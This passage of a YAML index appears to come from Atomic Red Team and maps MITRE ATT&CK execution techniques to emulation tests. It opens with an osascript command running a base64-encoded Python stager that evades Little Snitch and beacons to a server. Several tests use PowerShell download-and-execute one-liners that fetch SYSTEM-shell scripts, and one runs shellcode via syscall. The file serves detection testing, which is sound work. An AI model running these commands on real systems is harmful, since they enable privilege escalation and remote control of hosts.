command: 'osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg==''));\\\"
| python &\""
'
name: sh
T1106:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670
created: '2017-05-31T21:31:17.472Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1106
external_id: T1106
- source_name: MACOS Cocoa
description: Apple. (2015, September 16). Cocoa Application Layer. Retrieved
June 25, 2020.
url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1
- source_name: Apple Core Services
description: Apple. (n.d.). Core Services. Retrieved June 25, 2020.
url: https://developer.apple.com/documentation/coreservices
- source_name: macOS Foundation
description: Apple. (n.d.). Foundation. Retrieved July 1, 2020.
url: https://developer.apple.com/documentation/foundation
- source_name: OutFlank System Calls
description: 'de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct
System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.'
url: https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
- source_name: Redops Syscalls
description: Feichter, D. (2023, June 30). Direct Syscalls vs Indirect Syscalls.
Retrieved September 27, 2023.
url: https://redops.at/en/blog/direct-syscalls-vs-indirect-syscalls
- source_name: GNU Fork
description: Free Software Foundation, Inc.. (2020, June 18). Creating a Process.
Retrieved June 25, 2020.
url: https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html
- source_name: CyberBit System Calls
description: Gavriel, H. (2018, November 27). Malware Mitigation when Direct
System Calls are Used. Retrieved September 29, 2021.
url: https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/
- source_name: GLIBC
description: glibc developer community. (2020, February 1). The GNU C Library
(glibc). Retrieved June 25, 2020.
url: https://www.gnu.org/software/libc/
- source_name: LIBC
description: Kerrisk, M. (2016, December 12). libc(7) — Linux manual page.
Retrieved June 25, 2020.
url: https://man7.org/linux/man-pages//man7/libc.7.html
- source_name: Linux Kernel API
description: Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API.
Retrieved June 25, 2020.
url: https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html
- source_name: MDSec System Calls
description: MDSec Research. (2020, December). Bypassing User-Mode Hooks and
Direct Invocation of System Calls for Red Teams. Retrieved September 29,
2021.
url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
- source_name: Microsoft CreateProcess
description: Microsoft. (n.d.). CreateProcess function. Retrieved September
12, 2024.
url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
- source_name: Microsoft Win32
description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
March 15, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/api/
- source_name: Microsoft NET
description: Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15,
2020.
url: https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework
- source_name: NT API Windows
description: The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25,
2020.
url: https://undocumented.ntinternals.net/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:39.785Z'
name: Native API
description: |-
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.
Native API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
Adversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Gordon Long, LegioX/Zoom, asaurusrex
- Stefan Kanthak
- Tristan Madani (Cybereason)
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '2.3'
x_mitre_remote_support: false
identifier: T1106
atomic_tests:
- name: Execution through API - CreateProcess
auto_generated_guid: 99be2089-c52d-4a4a-b5c3-261ee42c8b62
description: Execute program by leveraging Win32 API's. By default, this will
launch calc.exe from the command prompt.
supported_platforms:
- windows
input_arguments:
source_file:
description: Location of the CSharp source file to compile and execute
type: path
default: PathToAtomicsFolder\T1106\src\CreateProcess.cs
output_file:
description: Location of the payload
type: path
default: "%tmp%\\T1106.exe"
dependency_executor_name: powershell
dependencies:
- description: "#{source_file} must exist on system.\n"
prereq_command: 'if (Test-Path "#{source_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{source_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1106/src/CreateProcess.cs" -OutFile "#{source_file}"
executor:
command: |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /target:exe "#{source_file}"
%tmp%/T1106.exe
name: command_prompt
- name: WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique
auto_generated_guid: ce4e76e6-de70-4392-9efe-b281fc2b4087
description: Get SYSTEM shell - Pop System Shell using CreateProcess technique
via function of WinPwn
supported_platforms:
- windows
executor:
command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')
name: powershell
- name: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique
auto_generated_guid: 7ec5b74e-8289-4ff2-a162-b6f286a33abd
description: Get SYSTEM shell - Bind System Shell using CreateProcess technique
via function of WinPwn
supported_platforms:
- windows
executor:
command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')
name: powershell
- name: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation
technique
auto_generated_guid: e1f93a06-1649-4f07-89a8-f57279a7d60e
description: Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation
technique via function of WinPwn
supported_platforms:
- windows
executor:
command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')
name: powershell
- name: Run Shellcode via Syscall in Go
auto_generated_guid: ae56083f-28d0-417d-84da-df4242da1f7c
description: |
Runs shellcode in the current running process via a syscall.
Steps taken with this technique
1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
3. Change the memory page permissions to Execute/Read with VirtualProtect
4. Use syscall to execute the entrypoint of the shellcode
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#syscall)
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: "$PathToAtomicsFolder\\T1106\\bin\\x64\\syscall.exe -debug\n"
cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
T1059.010:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--3a32740a-11b0-4bcf-b0a9-3abd0f6d3cd5
created: '2024-03-29T18:07:04.743Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1059/010
external_id: T1059.010
- source_name: AutoHotKey
description: AutoHotkey Foundation LLC. (n.d.). Using the Program. Retrieved
March 29, 2024.
url: https://www.autohotkey.com/docs/v1/Program.htm
- source_name: AutoIT
description: AutoIT. (n.d.). Running Scripts. Retrieved March 29, 2024.
url: https://www.autoitscript.com/autoit3/docs/intro/running.htm
- source_name: Splunk DarkGate
description: 'Splunk Threat Research Team. (2024, January 17). Enter The Gates:
An Analysis of the DarkGate AutoIt Loader. Retrieved March 29, 2024.'
url: https://www.splunk.com/en_us/blog/security/enter-the-gates-an-analysis-of-the-darkgate-autoit-loader.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:23.600Z'
name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- TruKno
- Liran Ravich, CardinalOps
- Serhii Melnyk, Trustwave SpiderLabs
- Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
- "@_montysecurity"
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1059.010
atomic_tests:
- name: AutoHotKey script execution
auto_generated_guid: 7b5d350e-f758-43cc-a761-8e3f6b052a03
description: 'An adversary may attempt to execute malicious script using AutoHotKey
software instead of regular terminal like powershell or cmd. A messagebox
will be displayed and calculator will popup when the script is executed successfully
'
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'AutoHotKey executable file must exist on disk at the specified
location (#{autohotkey_path})
'
prereq_command: |
if(Test-Path "#{autohotkey_path}") {
exit 0
} else {
exit 1
}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
$AutoHotKeyURL = "https://www.autohotkey.com/download/ahk.zip"
$InstallerPath = "$PathToAtomicsFolder\..\ExternalPayloads"
Invoke-WebRequest -Uri $AutoHotKeyURL -OutFile $InstallerPath\ahk.zip
Expand-Archive -Path $InstallerPath -Force;
input_arguments:
script_path:
description: AutoHotKey Script Path
type: path
default: PathToAtomicsFolder\T1059.010\src\calc.ahk
autohotkey_path:
description: AutoHotKey Executable File Path
type: path
default: "$PathToAtomicsFolder\\..\\ExternalPayloads\\ahk\\AutoHotKeyU64.exe"
executor:
command: 'Start-Process -FilePath "#{autohotkey_path}" -ArgumentList "#{script_path}"
'
name: powershell
T1569.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--4b46767d-4a61-4f30-995e-c19a75c2e536
created: '2025-03-18T13:44:12.618Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1569/003
external_id: T1569.003
- source_name: Red Hat Systemctl 2022
description: Damon Garn. (2022, May 17). How to use systemctl to manage Linux
services. Retrieved March 18, 2025.
url: https://www.redhat.com/en/blog/linux-systemctl-manage-services
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
into scripts or applications. \n\nAdversaries may use systemctl to execute
commands or programs as [Systemd Service](https://attack.mitre.org/techniques/T1543/002)s.
Common subcommands include: `systemctl start`, `systemctl stop`, `systemctl
enable`, `systemctl disable`, and `systemctl status`.(Citation: Red Hat Systemctl
2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
atomic_tests: []
T1059.009:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--55bb4471-ff1f-43b4-88c1-c9384ec47abf
created: '2022-03-17T13:28:24.989Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1059/009
external_id: T1059.009
- source_name: Microsoft - Azure PowerShell
description: Microsoft. (2014, December 12). Azure/azure-powershell. Retrieved
March 24, 2023.
url: https://github.com/Azure/azure-powershell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:32.612Z'
name: Cloud API
description: "Adversaries may abuse cloud APIs to execute malicious commands.
APIs available in cloud environments provide various functionalities and are
a feature-rich method for programmatic access to nearly all aspects of a tenant.
These APIs may be utilized through various methods such as command line interpreters
(CLIs), in-browser Cloud Shells, [PowerShell](https://attack.mitre.org/techniques/T1059/001)
modules like Azure for PowerShell(Citation: Microsoft - Azure PowerShell),
or software developer kits (SDKs) available for languages such as [Python](https://attack.mitre.org/techniques/T1059/006).
\ \n\nCloud API functionality may allow for administrative access across all
major services in a tenant such as compute, storage, identity and access management
(IAM), networking, and security policies.\n\nWith proper permissions (often
via use of credentials such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001)
and [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)),
adversaries may abuse cloud APIs to invoke various functions that execute
malicious actions. For example, CLI and PowerShell functionality may be accessed
through binaries installed on cloud-hosted or on-premises hosts or accessed
through a browser-based cloud shell offered by many cloud platforms (such
as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment
to use CLI and/or scripting modules hosted as a container in the cloud environment.
\ "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Ozan Olali
- Nichols Jasper
- Jason Sevilla
- Marcus Weeks
- Caio Silva
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- Identity Provider
- Office Suite
- SaaS
x_mitre_version: '1.2'
x_mitre_remote_support: false
atomic_tests: []
T1610:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--56e0d8b8-3e25-49dd-9050-3aa252f5aa92
created: '2021-03-29T16:51:26.020Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1610
external_id: T1610
- source_name: AppSecco Kubernetes Namespace Breakout 2020
description: Abhisek Datta. (2020, March 18). Kubernetes Namespace Breakout
using Insecure Host Path Volume — Part 1. Retrieved January 16, 2024.
url: https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216
- source_name: Aqua Build Images on Hosts
description: 'Assaf Morag. (2020, July 15). Threat Alert: Attackers Building
Malicious Images on Your Hosts. Retrieved March 29, 2021.'
url: https://blog.aquasec.com/malicious-container-image-docker-container-host
- source_name: Docker Containers API
description: Docker. (n.d.). Docker Engine API v1.41 Reference - Container.
Retrieved March 29, 2021.
url: https://docs.docker.com/engine/api/v1.41/#tag/Container
- source_name: Kubernetes Workload Management
description: Kubernetes. (n.d.). Workload Management. Retrieved March 28,
2024.
url: https://kubernetes.io/docs/concepts/workloads/controllers/
- source_name: Kubeflow Pipelines
description: The Kubeflow Authors. (n.d.). Overview of Kubeflow Pipelines.
Retrieved March 29, 2021.
url: https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/
- source_name: Kubernetes Dashboard
description: The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard).
Retrieved March 29, 2021.
url: https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:49.017Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Pawan Kinger, @kingerpawan, Trend Micro
- Alfredo Oliveira, Trend Micro
- Idan Frimark, Cisco
- Center for Threat-Informed Defense (CTID)
- Magno Logan, @magnologan, Trend Micro
- Ariel Shuper, Cisco
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
- Joas Antonio dos Santos, @C0d3Cr4zy
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
x_mitre_version: '1.4'
identifier: T1610
atomic_tests:
- name: Deploy Docker container
auto_generated_guid: 59aa6f26-7620-417e-9318-589e0fb7a372
description: "Adversaries may deploy containers based on retrieved or built
malicious images or from benign images that download and execute malicious
payloads at runtime. They can do this using docker create and docker start
commands. Kinsing & Doki was exploited using this technique. \n"
supported_platforms:
- containers
dependency_executor_name: sh
dependencies:
- description: Verify docker is installed.
prereq_command: 'which docker
'
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
echo "Docker installed"; fi
'
- description: Verify docker service is running.
prereq_command: 'sudo systemctl status docker --no-pager
'
get_prereq_command: 'sudo systemctl start docker
'
executor:
command: |
docker build -t t1610 $PathtoAtomicsFolder/T1610/src/
docker run --name t1610_container --rm -itd t1610 bash /tmp/script.sh
name: bash
cleanup_command: "docker stop t1610_container\ndocker rmi -f t1610:latest
\n"
T1674:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--63e3d25c-d57d-407d-8e6a-2cecd71f90be
created: '2025-03-27T18:14:06.330Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1674
external_id: T1674
- source_name: BleepingComputer BackSwap
description: Catalin Cimpanu. (2018, May 25). BackSwap Banking Trojan Uses
Never-Before-Seen Techniques. Retrieved March 27, 2025.
url: https://www.bleepingcomputer.com/news/security/backswap-banking-trojan-uses-never-before-seen-techniques/
- source_name: BleepingComputer USB
description: 'Ionut Ilascu. (2020, March 27). FBI: Hackers Sending Malicious
USB Drives & Teddy Bears via USPS. Retrieved March 27, 2025.'
url: https://www.bleepingcomputer.com/news/security/fbi-hackers-sending-malicious-usb-drives-and-teddy-bears-via-usps/
- source_name: welivesecurity BackSwap
description: Michal Poslušný. (2018, May 25). BackSwap malware finds innovative
ways to empty bank accounts. Retrieved March 27, 2025.
url: https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:36.409Z'
name: Input Injection
description: |-
Adversaries may simulate keystrokes on a victim’s computer by various means to perform any type of action on behalf of the user, such as launching the command interpreter using keyboard shortcuts, typing an inline script to be executed, or interacting directly with a GUI-based application. These actions can be preprogrammed into adversary tooling or executed through physical devices such as Human Interface Devices (HIDs).
For example, adversaries have used tooling that monitors the Windows message loop to detect when a user visits bank-specific URLs. If detected, the tool then simulates keystrokes to open the developer console or select the address bar, pastes malicious JavaScript from the clipboard, and executes it - enabling manipulation of content within the browser, such as replacing bank account numbers during transactions.(Citation: BleepingComputer BackSwap)(Citation: welivesecurity BackSwap)
Adversaries have also used malicious USB devices to emulate keystrokes that launch PowerShell, leading to the download and execution of malware from adversary-controlled servers.(Citation: BleepingComputer USB)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Alexey Kleymenov
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- macOS
- Linux
x_mitre_version: '1.0'
atomic_tests: []
T1059:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830
created: '2017-05-31T21:30:49.546Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1059
external_id: T1059
- source_name: Remote Shell Execution in Python
description: Abdou Rockikz. (2020, July). How to Execute Shell Commands in
a Remote Machine in Python. Retrieved July 26, 2021.
url: https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python
- source_name: Cisco IOS Software Integrity Assurance - Command History
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command
History. Retrieved October 21, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23
- source_name: Powershell Remote Commands
description: Microsoft. (2020, August 21). Running Remote Commands. Retrieved
July 26, 2021.
url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:57.520Z'
name: Command and Scripting Interpreter
description: |-
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).
Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- ESXi
- IaaS
- Identity Provider
- Linux
- macOS
- Network Devices
- Office Suite
- Windows
x_mitre_version: '2.6'
x_mitre_remote_support: false
identifier: T1059
atomic_tests:
- name: AutoIt Script Execution
auto_generated_guid: a9b93f17-31cb-435d-a462-5e838a2a6026
description: 'An adversary may attempt to execute suspicious or malicious script
using AutoIt software instead of regular terminal like powershell or cmd.
Calculator will popup when the script is executed successfully.
'
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'AutoIt executable file must exist on disk at the specified location
(#{autoit_path})
'
prereq_command: |
if(Test-Path "#{autoit_path}") {
exit 0
} else {
exit 1
}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
$AutoItURL = "https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe"
$InstallerPath = "$PathToAtomicsFolder\..\ExternalPayloads\autoit-v3-setup.exe"
Invoke-WebRequest -Uri $AutoItURL -OutFile $InstallerPath
Start-Process -FilePath $InstallerPath -ArgumentList "/S" -Wait
input_arguments:
script_path:
description: AutoIt Script Path
type: path
default: PathToAtomicsFolder\T1059\src\calc.au3
autoit_path:
description: AutoIt Executable File Path
type: path
default: C:\Program Files (x86)\AutoIt3\AutoIt3.exe
executor:
command: 'Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
'
name: powershell
T1204.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--73b24a10-6bf4-4af1-a81e-67b8bcb6c4e6
created: '2025-05-22T19:50:18.472Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1204/005
external_id: T1204.005
- source_name: Datadog Security Labs Malicious PyPi Packages 2024
description: " Sebastian Obregoso and Christophe Tafani-Dereeper. (2024,
May 23). Malicious PyPI packages targeting highly specific MacOS machines.
Retrieved May 22, 2025."
url: https://securitylabs.datadoghq.com/articles/malicious-pypi-package-targeting-highly-specific-macos-machines/
- source_name: Fortinet Malicious NPM Packages 2023
description: Jin Lee and Jenna Wang. (2023, October 2). Malicious Packages
